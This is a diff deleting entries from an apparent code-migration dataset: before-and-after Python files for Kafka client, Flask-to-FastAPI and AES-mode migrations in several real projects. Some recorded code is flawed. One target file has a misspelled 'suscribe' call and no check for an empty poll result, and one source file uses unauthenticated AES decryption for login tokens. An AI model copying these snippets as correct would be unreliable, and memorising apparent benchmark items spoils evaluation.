(permissions.AllowAny,) - renderer_classes = [renderers.OpenAPIRenderer, renderers.SwaggerUIRenderer] - schema = None - - def get(self, request): - params = { - "urlconf": "api_v2.urls", - } - if "HTTP_X_FORWARDED_HOST" in request.META: - # forwarding via tob-web - #params["url"] = "{}://{}/api/".format( - # request.META.get("HTTP_X_FORWARDED_PROTO", "http"), - # request.META["HTTP_X_FORWARDED_HOST"]) - params["url"] = "/api/" - else: - params["url"] = "/api/v2/" - generator = SchemaGenerator(**params) - schema = generator.get_schema(request=request) - return Response(schema) diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff b/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff deleted file mode 100644 index bd70d39..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff +++ /dev/null @@ -1,79 +0,0 @@ -diff --git a/agent/dnsagent/clis/start.py b/agent/dnsagent/clis/start.py - index 69dba880876b66b98de7538b33304fb4ff5d8aef..6b10345398630fbb418f84ca7268d481ecad56ee 100644 - --- a/agent/dnsagent/clis/start.py - +++ b/agent/dnsagent/clis/start.py -@@ -1,8 +1,10 @@ - import os - import logging -+import json -+ -+from confluent_kafka import Consumer, KafkaException - - from dnsagent.clis.base import Base --from dnsagent.libs import kafka as kafka_lib - from dnsagent.libs import knot as knot_lib - - -@@ -20,30 +22,27 @@ class Start(Base): - -h --help Print usage - """ - -- def connect_kafka(self): -- broker_host = os.environ.get("RESTKNOT_KAFKA_BROKER") -- broker_port = os.environ.get("RESTKNOT_KAFKA_PORTS") -- broker = f"{broker_host}:{broker_port}" -+ def consume(self): -+ brokers = os.environ.get("RESTKNOT_KAFKA_BROKERS") - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") -+ agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") - -- if (broker_host and broker_port) is None: -- logger.info("Can't find kafka host and port") -- exit() -+ conf = { -+ "bootstrap.servers": brokers, -+ "auto.offset.reset": "earliest", -+ "enable.auto.commit": True, -+ } -+ consumer = Consumer(conf) -+ consumer.suscribe(topic) - - try: -- logger.info("Connecting to broker : " + broker) -- consumer = kafka_lib.get_kafka_consumer(broker, topic) -- return consumer -- except Exception as e: -- logger.info(f"Can't Connect to broker: {e}") -- exit() -- -- def take_message(self, consumer): -- agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") -+ while True: -+ message = consumer.poll(timeout=1.0) -+ if message.error(): -+ raise KafkaException(message.error()) - -- try: -- for message in consumer: -- message = message.value -+ message = message.value() -+ message = json.loads(message.decode("utf-8")) - - agent_type_msg = message["agent"]["agent_type"] - if agent_type in agent_type_msg: -@@ -52,11 +51,11 @@ class Start(Base): - for query in knot_queries: - knot_lib.execute(query) - -- consumer.close() -- - except KeyboardInterrupt: - print("Stopping dnsagent. Press Ctrl+C again to exit") -+ finally: -+ # Close down consumer to commit final offsets. 
-+ consumer.close() - - def execute(self): -- consumer = self.connect_kafka() -- self.take_message(consumer) -+ self.consume() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py b/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py deleted file mode 100644 index 1416e66..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py +++ /dev/null @@ -1,62 +0,0 @@ -import os -import logging - -from dnsagent.clis.base import Base -from dnsagent.libs import kafka as kafka_lib -from dnsagent.libs import knot as knot_lib - - -logger = logging.getLogger(__name__) - - -class Start(Base): - """ - usage: - start - - Command : - - Options: - -h --help Print usage - """ - - def connect_kafka(self): - broker_host = os.environ.get("RESTKNOT_KAFKA_BROKER") - broker_port = os.environ.get("RESTKNOT_KAFKA_PORTS") - broker = f"{broker_host}:{broker_port}" - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - - if (broker_host and broker_port) is None: - logger.info("Can't find kafka host and port") - exit() - - try: - logger.info("Connecting to broker : " + broker) - consumer = kafka_lib.get_kafka_consumer(broker, topic) - return consumer - except Exception as e: - logger.info(f"Can't Connect to broker: {e}") - exit() - - def take_message(self, consumer): - agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") - - try: - for message in consumer: - message = message.value - - agent_type_msg = message["agent"]["agent_type"] - if agent_type in agent_type_msg: - - knot_queries = message["knot"] - for query in knot_queries: - knot_lib.execute(query) - - consumer.close() - - except KeyboardInterrupt: - print("Stopping dnsagent. Press Ctrl+C again to exit") - - def execute(self): - consumer = self.connect_kafka() - self.take_message(consumer) diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py b/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py deleted file mode 100644 index b43ab65..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py +++ /dev/null @@ -1,61 +0,0 @@ -import os -import logging -import json - -from confluent_kafka import Consumer, KafkaException - -from dnsagent.clis.base import Base -from dnsagent.libs import knot as knot_lib - - -logger = logging.getLogger(__name__) - - -class Start(Base): - """ - usage: - start - - Command : - - Options: - -h --help Print usage - """ - - def consume(self): - brokers = os.environ.get("RESTKNOT_KAFKA_BROKERS") - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - agent_type = os.environ.get("RESTKNOT_AGENT_TYPE") - - conf = { - "bootstrap.servers": brokers, - "auto.offset.reset": "earliest", - "enable.auto.commit": True, - } - consumer = Consumer(conf) - consumer.suscribe(topic) - - try: - while True: - message = consumer.poll(timeout=1.0) - if message.error(): - raise KafkaException(message.error()) - - message = message.value() - message = json.loads(message.decode("utf-8")) - - agent_type_msg = message["agent"]["agent_type"] - if agent_type in agent_type_msg: - - knot_queries = message["knot"] - for query in knot_queries: - knot_lib.execute(query) - - except KeyboardInterrupt: - print("Stopping dnsagent. Press Ctrl+C again to exit") - finally: - # Close down consumer to commit final offsets. 
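# Note (editorial annotation on the recorded code above, not a change to it): with
# confluent-kafka, Consumer.subscribe() takes a *list* of topic names, and the call
# spelled `consumer.suscribe(topic)` in this file would raise AttributeError at
# runtime. poll() can also return None on timeout, which should be checked before
# calling .error(). A minimal loop under those assumptions:
#
#   consumer.subscribe([topic])
#   while True:
#       message = consumer.poll(timeout=1.0)
#       if message is None:
#           continue  # no record arrived within the timeout
#       if message.error():
#           raise KafkaException(message.error())
#       payload = json.loads(message.value().decode("utf-8"))
#
# close() then commits final offsets (enable.auto.commit is true here) and leaves
# the consumer group cleanly.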
- consumer.close() - - def execute(self): - self.consume() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff b/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff deleted file mode 100644 index 1e68ac3..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff +++ /dev/null @@ -1,53 +0,0 @@ -diff --git a/api/app/helpers/producer.py b/api/app/helpers/producer.py - index 69dba880876b66b98de7538b33304fb4ff5d8aef..6b10345398630fbb418f84ca7268d481ecad56ee 100644 - --- a/api/app/helpers/producer.py - +++ b/api/app/helpers/producer.py -@@ -2,7 +2,7 @@ import json - import os - - from flask import current_app --from kafka import KafkaProducer -+from confluent_kafka import Producer - - from app.helpers import helpers - -@@ -15,24 +15,30 @@ def kafka_producer(): - except KeyError: - raise ValueError("Can't find brokers list in config") - -- producer = KafkaProducer( -- bootstrap_servers=brokers, -- value_serializer=lambda m: json.dumps(m).encode("utf-8"), -- ) -+ brokers = ",".join(brokers) -+ conf = {"bootstrap.servers": brokers} -+ producer = Producer(**conf) - return producer - - -+def _delivery_report(err, msg): -+ if err is not None: -+ raise ValueError(f"Message delivery failed: {err}") -+ -+ - def send(message): - """Send given message to Kafka broker.""" - producer = None - try: - producer = kafka_producer() - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") -- producer.send(topic, message) -- producer.flush() -+ encoded_message = json.dumps(message).encode("utf-8") -+ producer.produce(topic, encoded_message, callback=_delivery_report) - except Exception as e: - current_app.logger.error(f"{e}") - raise ValueError(f"{e}") -- finally: -- if producer: -- producer.close() -+ -+ # Serve delivery callback queue. 
-+ producer.poll(0) -+ # Wait until all messages have been delivered -+ producer.flush() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py b/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py deleted file mode 100644 index 17562f7..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py +++ /dev/null @@ -1,38 +0,0 @@ -import json -import os - -from flask import current_app -from kafka import KafkaProducer - -from app.helpers import helpers - - -def kafka_producer(): - """Create Kafka producer.""" - config = helpers.get_config() - try: - brokers = config["brokers"] - except KeyError: - raise ValueError("Can't find brokers list in config") - - producer = KafkaProducer( - bootstrap_servers=brokers, - value_serializer=lambda m: json.dumps(m).encode("utf-8"), - ) - return producer - - -def send(message): - """Send given message to Kafka broker.""" - producer = None - try: - producer = kafka_producer() - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - producer.send(topic, message) - producer.flush() - except Exception as e: - current_app.logger.error(f"{e}") - raise ValueError(f"{e}") - finally: - if producer: - producer.close() diff --git a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py b/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py deleted file mode 100644 index 04dd011..0000000 --- a/v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py +++ /dev/null @@ -1,44 +0,0 @@ -import json -import os - -from flask import current_app -from confluent_kafka import Producer - -from app.helpers import helpers - - -def kafka_producer(): - """Create Kafka producer.""" - config = helpers.get_config() - try: - brokers = config["brokers"] - except KeyError: - raise ValueError("Can't find brokers list in config") - - brokers = ",".join(brokers) - conf = {"bootstrap.servers": brokers} - producer = Producer(**conf) - return producer - - -def _delivery_report(err, msg): - if err is not None: - raise ValueError(f"Message delivery failed: {err}") - - -def send(message): - """Send given message to Kafka broker.""" - producer = None - try: - producer = kafka_producer() - topic = os.environ.get("RESTKNOT_KAFKA_TOPIC") - encoded_message = json.dumps(message).encode("utf-8") - producer.produce(topic, encoded_message, callback=_delivery_report) - except Exception as e: - current_app.logger.error(f"{e}") - raise ValueError(f"{e}") - - # Serve delivery callback queue. 
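# Note (editorial annotation): confluent-kafka's produce() is asynchronous — it only
# enqueues the message. poll(0) serves the delivery-report callback queue for earlier
# sends, and flush() blocks until every outstanding message is delivered or fails,
# invoking _delivery_report with the per-message error. Because callbacks run in the
# thread that calls poll()/flush(), the ValueError raised by _delivery_report
# propagates to this caller. Typical shape:
#
#   producer.produce(topic, b"payload", callback=_delivery_report)
#   producer.poll(0)    # serve delivery callbacks for earlier sends
#   producer.flush()    # block until the outbound queue drains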
- producer.poll(0) - # Wait until all messages have been delivered - producer.flush() diff --git a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff b/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff deleted file mode 100644 index afaf8f0..0000000 --- a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff +++ /dev/null @@ -1,15 +0,0 @@ -diff --git a/python/verb_conjugate_fr/__init__.py b/python/verb_conjugate_fr/__init__.py - index 85a5ef1f0d74fae1db084114a914f1df6f646480..24a848d285ae2c6f3e5b06d1a8ee718cb3f17133 100644 - --- a/python/verb_conjugate_fr/__init__.py - +++ b/python/verb_conjugate_fr/__init__.py -@@ -1,8 +1,5 @@ - #!/usr/bin/env python --from flask import Flask --from flask_restful import Api -- --app = Flask(__name__) --api = Api(app) -+from fastapi import FastAPI -+app = FastAPI(title="verb-conjugate-fr") - - import verb_conjugate_fr.views diff --git a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py b/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py deleted file mode 100644 index 0551464..0000000 --- a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python -from flask import Flask -from flask_restful import Api - -app = Flask(__name__) -api = Api(app) - -import verb_conjugate_fr.views diff --git a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py b/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py deleted file mode 100644 index b1960ca..0000000 --- a/v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py +++ /dev/null @@ -1,5 +0,0 @@ -#!/usr/bin/env python -from fastapi import FastAPI -app = FastAPI(title="verb-conjugate-fr") - -import verb_conjugate_fr.views diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff deleted file mode 100644 index 74142e3..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/geoportal/c2cgeoportal_geoportal/__init__.py b/geoportal/c2cgeoportal_geoportal/__init__.py - index 290aac93ed6e3874bb3789b0f5a0852b68cc47fe..14388c3d85ab164d7b36b1331534913a1c9d6c9a 100644 - --- a/geoportal/c2cgeoportal_geoportal/__init__.py - +++ b/geoportal/c2cgeoportal_geoportal/__init__.py -@@ -319,8 +319,12 @@ def create_get_user_from_request(settings): - if aeskey is None: # pragma: nocover - raise Exception("urllogin is not configured") - now = int(time.time()) -- cipher = AES.new(aeskey) -- auth = json.loads(cipher.decrypt(binascii.unhexlify(auth_enc))) -+ data = binascii.unhexlify(auth_enc.encode('ascii')) -+ nonce = data[0:16] -+ tag = data[16:32] -+ ciphertext = data[32:] -+ cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX, nonce) -+ auth = json.loads(cipher.decrypt_and_verify(ciphertext, tag).decode("utf-8")) - - if "t" in auth and "u" in auth and "p" in auth: - timestamp = int(auth["t"]) diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py 
b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py deleted file mode 100644 index 7092b6a..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py +++ /dev/null @@ -1,765 +0,0 @@ -# -*- coding: utf-8 -*- - -# Copyright (c) 2011-2018, Camptocamp SA -# All rights reserved. - -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: - -# 1. Redistributions of source code must retain the above copyright notice, this -# list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. - -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# The views and conclusions contained in the software and documentation are those -# of the authors and should not be interpreted as representing official policies, -# either expressed or implied, of the FreeBSD Project. - -import time -import logging -import mimetypes -import binascii -from urllib.parse import urlsplit - -import c2cwsgiutils -import re -import simplejson as json -from socket import gethostbyname, gaierror -from ipcalc import IP, Network -from Crypto.Cipher import AES -import importlib - -import zope.event.classhandler -from pyramid.config import Configurator -from pyramid_mako import add_mako_renderer -from pyramid.interfaces import IStaticURLInfo -from pyramid.httpexceptions import HTTPException -import pyramid.security - -from papyrus.renderers import GeoJSON, XSD - -import c2cwsgiutils.db -from c2cwsgiutils.health_check import HealthCheck -from sqlalchemy.orm import Session - -import c2cgeoportal_commons.models -from c2cgeoportal_geoportal.lib import dbreflection, caching, \ - C2CPregenerator, MultiDomainStaticURLInfo, checker, check_collector - -log = logging.getLogger(__name__) - -# used by (sql|form)alchemy - -# Header predicate to accept only JSON content -# OL/cgxp are not setting the correct content type for JSON. We have to accept -# XML as well even though JSON is actually send. 
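# Note (editorial annotation, not part of the recorded file): the constant defined
# below is a Pyramid *header predicate* of the form "Header-Name:regex". Routes
# registered with header=JSON_CONTENT_TYPE therefore match only requests whose
# Content-Type is application/json or application/xml; XML is tolerated because, as
# the comment above explains, OL/cgxp clients send JSON bodies under an XML content
# type.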
-JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)" - - -class DecimalJSON: - def __init__(self, jsonp_param_name="callback"): - self.jsonp_param_name = jsonp_param_name - - def __call__(self, info): - def _render(value, system): - ret = json.dumps(value, use_decimal=True) - request = system.get("request") - if request is not None: - callback = request.params.get(self.jsonp_param_name) - if callback is None: - request.response.content_type = "application/json" - else: - request.response.content_type = "text/javascript" - ret = "{callback!s}({json!s});".format( - callback=callback, - json=ret - ) - return ret - return _render - - -INTERFACE_TYPE_CGXP = "cgxp" -INTERFACE_TYPE_NGEO = "ngeo" -INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo" - - -def add_interface( - config, interface_name="desktop", interface_type=INTERFACE_TYPE_CGXP, default=False, **kwargs -): # pragma: no cover - if interface_type == INTERFACE_TYPE_CGXP: - add_interface_cgxp( - config, - interface_name=interface_name, - route_names=(interface_name, interface_name + ".js"), - routes=( - "/" if default else "/{0!s}".format(interface_name), - "/{0!s}.js".format(interface_name) - ), - renderers=("/{0!s}.html".format(interface_name), "/{0!s}.js".format(interface_name)), - **kwargs - ) - - elif interface_type == INTERFACE_TYPE_NGEO: - route = "/" if default else "/{0!s}".format(interface_name) - add_interface_ngeo( - config, - interface_name=interface_name, - route_name=interface_name, - route=route, - renderer="/{0!s}.html".format(interface_name), - **kwargs - ) - - -def add_interface_cgxp( - config, interface_name, route_names, routes, renderers, permission=None): # pragma: no cover - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_names[0], routes[0]) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_index_vars", - route_name=route_names[0], - renderer=renderers[0], - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - config.add_route( - "{0!s}theme".format(route_names[0]), - "{0!s}{1!s}theme/{{themes}}".format(routes[0], "" if routes[0][-1] == "/" else "/"), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_permalinktheme_vars", - route_name="{0!s}theme".format(route_names[0]), - renderer=renderers[0], - permission=permission - ) - config.add_route( - route_names[1], routes[1], - request_method="GET", - pregenerator=C2CPregenerator(role=True), - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_cgxp_viewer_vars", - route_name=route_names[1], - renderer=renderers[1], - permission=permission - ) - - -ngeo_static_init = False - - -def add_interface_ngeo( - config, interface_name, route_name, route, renderer, permission=None): # pragma: no cover - # Cannot be at the header to do not load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - - def add_interface(f): - def new_f(root, request): - request.interface_name = interface_name - return f(root, request) - return new_f - - config.add_route(route_name, route, request_method="GET") - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_index_vars", - route_name=route_name, - renderer=renderer, - permission=permission - ) - # permalink theme: recover the theme for generating custom viewer.js url - 
config.add_route( - "{}theme".format(route_name), - "{}{}theme/{{themes}}".format(route, "" if route[-1] == "/" else "/"), - request_method="GET", - ) - config.add_view( - Entry, - decorator=add_interface, - attr="get_ngeo_permalinktheme_vars", - route_name="{}theme".format(route_name), - renderer=renderer, - permission=permission - ) - - global ngeo_static_init - if not ngeo_static_init: - add_static_view_ngeo(config) - ngeo_static_init = True - - -def add_static_view_ngeo(config): # pragma: no cover - """ Add the project static view for ngeo """ - package = config.get_settings()["package"] - _add_static_view(config, "static-ngeo", "{0!s}_geoportal:static-ngeo".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static-ngeo/".format(package) - ) - config.add_static_view( - name=package, - path="{0!s}_geoportal:static".format(package), - cache_max_age=int(config.get_settings()["default_max_age"]) - ) - - mimetypes.add_type("text/css", ".less") - - -def add_admin_interface(config): - if config.get_settings().get("enable_admin_interface", False): - config.add_request_method( - # pylint: disable=not-callable - lambda request: c2cgeoportal_commons.models.DBSession(), 'dbsession', reify=True - ) - config.include('c2cgeoportal_admin', route_prefix='/admin') - - -def add_static_view(config): - """ Add the project static view for CGXP """ - package = config.get_settings()["package"] - _add_static_view(config, "static-cgxp", "{0!s}_geoportal:static".format(package)) - config.override_asset( - to_override="c2cgeoportal_geoportal:project/", - override_with="{0!s}_geoportal:static/".format(package) - ) - - -CACHE_PATH = [] - - -def _add_static_view(config, name, path): - from c2cgeoportal_geoportal.lib.cacheversion import version_cache_buster - config.add_static_view( - name=name, - path=path, - cache_max_age=int(config.get_settings()["default_max_age"]), - ) - config.add_cache_buster(path, version_cache_buster) - CACHE_PATH.append(name) - - -def locale_negotiator(request): - lang = request.params.get("lang") - if lang is None: - lang = request.cookies.get('_LOCALE_') - else: - request.response.set_cookie('_LOCALE_', lang) - if lang is None: - # if best_match returns None then use the default_locale_name configuration variable - return request.accept_language.best_match( - request.registry.settings.get("available_locale_names"), - default_match=request.registry.settings.get("default_locale_name")) - return lang - - -def _match_url_start(reference, value): - """ - Checks that the val URL starts like the ref URL. - """ - reference_parts = reference.rstrip("/").split("/") - value_parts = value[0:len(reference_parts)] - return reference_parts == value_parts - - -def is_valid_referer(request, settings): - if request.referer is not None: - referer = urlsplit(request.referer)._replace(query="", fragment="").geturl().rstrip("/").split("/") - list_ = settings.get("authorized_referers", []) - return any(_match_url_start(e, referer) for e in list_) - else: - return True - - -def create_get_user_from_request(settings): - def get_user_from_request(request, username=None): - """ Return the User object for the request. 
- - Return ``None`` if: - * user is anonymous - * it does not exist in the database - * the referer is invalid - """ - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - - try: - if "auth" in request.params: - auth_enc = request.params.get("auth") - - if auth_enc is not None: - urllogin = request.registry.settings.get("urllogin", {}) - aeskey = urllogin.get("aes_key") - if aeskey is None: # pragma: nocover - raise Exception("urllogin is not configured") - now = int(time.time()) - cipher = AES.new(aeskey) - auth = json.loads(cipher.decrypt(binascii.unhexlify(auth_enc))) - - if "t" in auth and "u" in auth and "p" in auth: - timestamp = int(auth["t"]) - if now < timestamp and request.registry.validate_user( - request, auth["u"], auth["p"] - ): - headers = pyramid.security.remember(request, auth["u"]) - request.response.headerlist.extend(headers) - except Exception as e: - log.error("URL login error: %s.", e, exc_info=True) - - if not hasattr(request, "is_valid_referer"): - request.is_valid_referer = is_valid_referer(request, settings) - if not request.is_valid_referer: - log.warning( - "Invalid referer for %s: %s", request.path_qs, repr(request.referer) - ) - return None - - if not hasattr(request, "user_"): - request.user_ = None - if username is None: - username = request.authenticated_userid - if username is not None: - # We know we will need the role object of the - # user so we use joined loading - request.user_ = DBSession.query(User) \ - .filter_by(username=username) \ - .first() - - return request.user_ - return get_user_from_request - - -def set_user_validator(config, user_validator): - """ Call this function to register a user validator function. - - The validator function is passed three arguments: ``request``, - ``username``, and ``password``. The function should return the - user name if the credentials are valid, and ``None`` otherwise. - - The validator should not do the actual authentication operation - by calling ``remember``, this is handled by the ``login`` view. - """ - def register(): - config.registry.validate_user = user_validator - config.action("user_validator", register) - - -def default_user_validator(request, username, password): - """ - Validate the username/password. This is c2cgeoportal's - default user validator. - Return None if we are anonymous, the string to remember otherwise. - """ - del request # unused - from c2cgeoportal_commons.models import DBSession - from c2cgeoportal_commons.models.static import User - user = DBSession.query(User).filter_by(username=username).first() - if user is None: - log.info('Unknow user "{}" tried to log in'.format(username)) - return None - if user.deactivated: - log.info('Deactivated user "{}" tried to log in'.format(username)) - return None - if user.expired(): - log.info('Expired user "{}" tried to log in'.format(username)) - return None - if not user.validate_password(password): - log.info('User "{}" tried to log in with bad credentials'.format(username)) - return None - return username - - -class OgcproxyRoutePredicate: - """ Serve as a custom route predicate function for ogcproxy. - We do not want the OGC proxy to be used to reach the app's - mapserv script. We just return False if the url includes - "mapserv". It is rather drastic, but works for us. 
""" - - def __init__(self, val, config): - del val # unused - self.private_networks = [ - Network("127.0.0.0/8"), - Network("10.0.0.0/8"), - Network("172.16.0.0/12"), - Network("192.168.0.0/16"), - ] - - def __call__(self, context, request): - url = request.params.get("url") - if url is None: - return False - - parts = urlsplit(url) - try: - ip = IP(gethostbyname(parts.netloc)) - except gaierror as e: - log.info("Unable to get host name for {0!s}: {1!s}".format(url, e)) - return False - for net in self.private_networks: - if ip in net: - return False - return True - - @staticmethod - def phash(): # pragma: no cover - return "" - - -class MapserverproxyRoutePredicate: - """ Serve as a custom route predicate function for mapserverproxy. - If the hide_capabilities setting is set and is true then we want to - return 404s on GetCapabilities requests.""" - - def __init__(self, val, config): - pass - - def __call__(self, context, request): - hide_capabilities = request.registry.settings.get("hide_capabilities") - if not hide_capabilities: - return True - params = dict( - (k.lower(), v.lower()) for k, v in request.params.items() - ) - return "request" not in params or params["request"] != "getcapabilities" - - @staticmethod - def phash(): - return "" - - -def add_cors_route(config, pattern, service): - """ - Add the OPTIONS route and view need for services supporting CORS. - """ - def view(request): # pragma: no cover - from c2cgeoportal_geoportal.lib.caching import set_common_headers, NO_CACHE - return set_common_headers(request, service, NO_CACHE) - - name = pattern + "_options" - config.add_route(name, pattern, request_method="OPTIONS") - config.add_view(view, route_name=name) - - -def error_handler(http_exception, request): # pragma: no cover - """ - View callable for handling all the exceptions that are not already handled. - """ - log.warning("%s returned status code %s", request.url, - http_exception.status_code) - return caching.set_common_headers( - request, "error", caching.NO_CACHE, http_exception, vary=True - ) - - -def call_hook(settings, name, *args, **kwargs): - hooks = settings.get("hooks", {}) - hook = hooks.get(name) - if hook is None: - return - parts = hook.split(".") - module = importlib.import_module(".".join(parts[0:-1])) - function = getattr(module, parts[-1]) - function(*args, **kwargs) - - -def includeme(config): - """ - This function returns a Pyramid WSGI application. 
- """ - - settings = config.get_settings() - - config.include("c2cgeoportal_commons") - - call_hook(settings, "after_settings", settings) - - get_user_from_request = create_get_user_from_request(settings) - config.add_request_method(get_user_from_request, name="user", property=True) - config.add_request_method(get_user_from_request, name="get_user") - - # Configure 'locale' dir as the translation dir for c2cgeoportal app - config.add_translation_dirs("c2cgeoportal_geoportal:locale/") - - config.include('c2cwsgiutils.pyramid.includeme') - health_check = HealthCheck(config) - - # Initialise DBSessions - init_dbsessions(settings, config, health_check) - - # Initialize the dbreflection module - dbreflection.init() - - checker.init(config, health_check) - check_collector.init(config, health_check) - - # dogpile.cache configuration - if 'cache' in settings: - caching.init_region(settings['cache']) - from c2cgeoportal_commons.models.main import InvalidateCacheEvent - - @zope.event.classhandler.handler(InvalidateCacheEvent) - def handle(event: InvalidateCacheEvent): - del event - caching.invalidate_region() - - # Register a tween to get back the cache buster path. - config.add_tween("c2cgeoportal_geoportal.lib.cacheversion.CachebusterTween") - config.add_tween("c2cgeoportal_geoportal.lib.webpack.WebpackTween") - - # Bind the mako renderer to other file extensions - add_mako_renderer(config, ".html") - add_mako_renderer(config, ".js") - - # Add the "geojson" renderer - config.add_renderer("geojson", GeoJSON()) - - # Add decimal json renderer - config.add_renderer("decimaljson", DecimalJSON()) - - # Add the "xsd" renderer - config.add_renderer("xsd", XSD( - sequence_callback=dbreflection.xsd_sequence_callback - )) - - # Add the set_user_validator directive, and set a default user validator - config.add_directive("set_user_validator", set_user_validator) - config.set_user_validator(default_user_validator) - - # Cannot be at the header to don"t load the model too early - from c2cgeoportal_geoportal.views.entry import Entry - config.add_route('dynamic', '/dynamic.js', request_method="GET") - config.add_view( - Entry, - attr="get_ngeo_index_vars", - route_name='dynamic', - renderer='/dynamic.js' - ) - if settings.get("ogcproxy_enable", False): # pragma: no cover - # Add an OGCProxy view - config.add_route_predicate("ogc_server", OgcproxyRoutePredicate) - config.add_route( - "ogcproxy", "/ogcproxy", - ogc_server=True - ) - config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy") - - # Add routes to the mapserver proxy - config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate) - config.add_route( - "mapserverproxy", "/mapserv_proxy", - mapserverproxy=True, pregenerator=C2CPregenerator(role=True), - ) - - # Add route to the tinyows proxy - config.add_route( - "tinyowsproxy", "/tinyows_proxy", - pregenerator=C2CPregenerator(role=True), - ) - - # Add routes to csv view - config.add_route("csvecho", "/csv", request_method="POST") - - # Add route to the export 